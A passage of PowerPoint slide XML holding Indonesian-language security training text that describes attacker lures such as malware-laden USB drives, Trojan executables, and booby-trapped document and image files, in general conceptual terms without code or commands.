              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperoleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cukup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelabui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memfasilitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> yang Dapat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Dilepas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyembunyikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware di USB thumb drive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kartu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelabui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghubungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PC, laptop, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ponsel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cerdas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cukup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghubungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cukup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>File yang Dapat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Dieksekusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyembunyikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file program. Salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contohnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware Trojan Horse. Trojan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> program yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tampaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang gratis dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyenangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebenarnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menciptakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>belakang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Dokumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyembunyikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyematkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengolah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata dan format PDF. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memanfaatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penampil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> editor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dokumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>File Gambar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyembunyikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gambar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
